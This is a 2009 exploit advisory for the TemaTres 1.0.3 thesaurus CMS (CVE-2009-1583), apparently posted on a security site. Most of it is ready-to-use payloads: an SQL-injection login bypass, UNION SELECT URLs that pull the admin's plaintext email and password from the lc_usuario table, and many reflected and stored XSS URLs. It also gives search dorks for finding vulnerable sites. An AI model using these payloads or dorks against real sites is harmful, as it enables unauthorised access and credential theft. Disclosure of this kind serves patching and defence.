TemaTres 1.0.3 Multiple remote vulns

2009.05.09
Credit: y3nh4ck3r
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-1583
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

--------------------------------------------------- MULTIPLE REMOTE VULNERABILITIES--TemaTres 1.0.3--> --------------------------------------------------- CMS INFORMATION: -->WEB: http://www.r020.com.ar/tematres/ -->DOWNLOAD: http://sourceforge.net/projects/tematres/ -->DEMO: http://www.r020.com.ar/tematres/index.php -->CATEGORY: CMS / Portals -->DESCRIPTION: Web application to manage controlled vocabularies, taxonomies and thesaurus... CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORKs: "Powered by TemaTres" / "Generado por TemaTres" / "Criado por TemaTres" -->CATEGORY: AUTH BYPASS/ SQL INJECTION/ XSS -->AFFECT VERSION: LAST = 1.0.3 (maybe <= ?) -->Discovered Bug date: 2009-04-23 -->Reported Bug date: 2009-04-23 -->Fixed bug date: 2009-05-04 -->Info patch (v1.0.31): http://www.r020.com.ar/tematres/tematres1.031.zip -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!). ############ ------------ CONDITIONS: ------------ ############ **gpc_magic_quotes=off **DBPREFIX='lc_' (Default) #################### -------------------- AUTH BYPASS (SQLi): -------------------- #################### mail:' or 1=1 /* password: Nothing Or... mail: Something password:' or 1=1 /* ###################### ---------------------- SQL INJECTION (SQLi): ---------------------- ###################### ~~~~~~---->Unregistered user (get var --> 'letra'): http://[HOST]/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,p ass+FROM+lc_usuario+WHERE+id=1/* <------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------> ~~~~~~---->Resgistered user (get vars --> 'y' and 'm'): http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007'+AND+0+UNION+ALL+SELECT+ 1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',data base()),7+FROM+lc_usuario+WHERE+id=1/* http://[HOST]/[HOME_PATH]/sobre.php?m=10'+AND+0+UNION+ALL+SELECT+1,conca t(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()) ,7+FROM+lc_usuario+WHERE+id=1/*&y=2007 <------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------> ############################ ---------------------------- CROSS SITE SCRIPTING (XSS): ---------------------------- ############################ There are a lot of links (This isn't entire list): ~~~------->Unregistered user <----Search form----> <script>while(1){alert('y3nh4ck3r was here!')}</script> <----More links----> http://[HOST]/[HOME_PATH]/index.php?_expresion_de_busqueda=<script>alert ('y3nh4ck3r was here!')</script>&sgs=off http://[HOST]/[HOME_PATH]/index.php?letra=D<script>alert('y3nh4ck3r was here!')</script> http://[HOST]/[HOME_PATH]/index.php?estado_id=14"><script>alert('y3nh4ck 3r was here!')</script> http://[HOST]/[HOME_PATH]/index.php?tema="><script>alert('y3nh4ck3r was here!')</script> http://[HOST]/[HOME_PATH]/index.php?tema=2&/trmino-subordinado-de-ejempl o"><script>alert('y3nh4ck3r was here!')</script> ~~~------->Registered user <----Posting here----> http://[HOST]/[HOME_PATH]/index.php?edit_id=12&tema=12 <script>alert('y3nh4ck3r was here!')</script> <----More links----> http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007"><script>alert('y3nh4ck3 r was here!')</script> http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007&ord=F"><script>alert('y3 nh4ck3r was here!')</script> http://[HOST]/[HOME_PATH]/sobre.php?m=10"><script>alert('y3nh4ck3r was here!')</script>&y=2007 ####################################################################### ####################################################################### ##*******************************************************************## ## ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2k ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top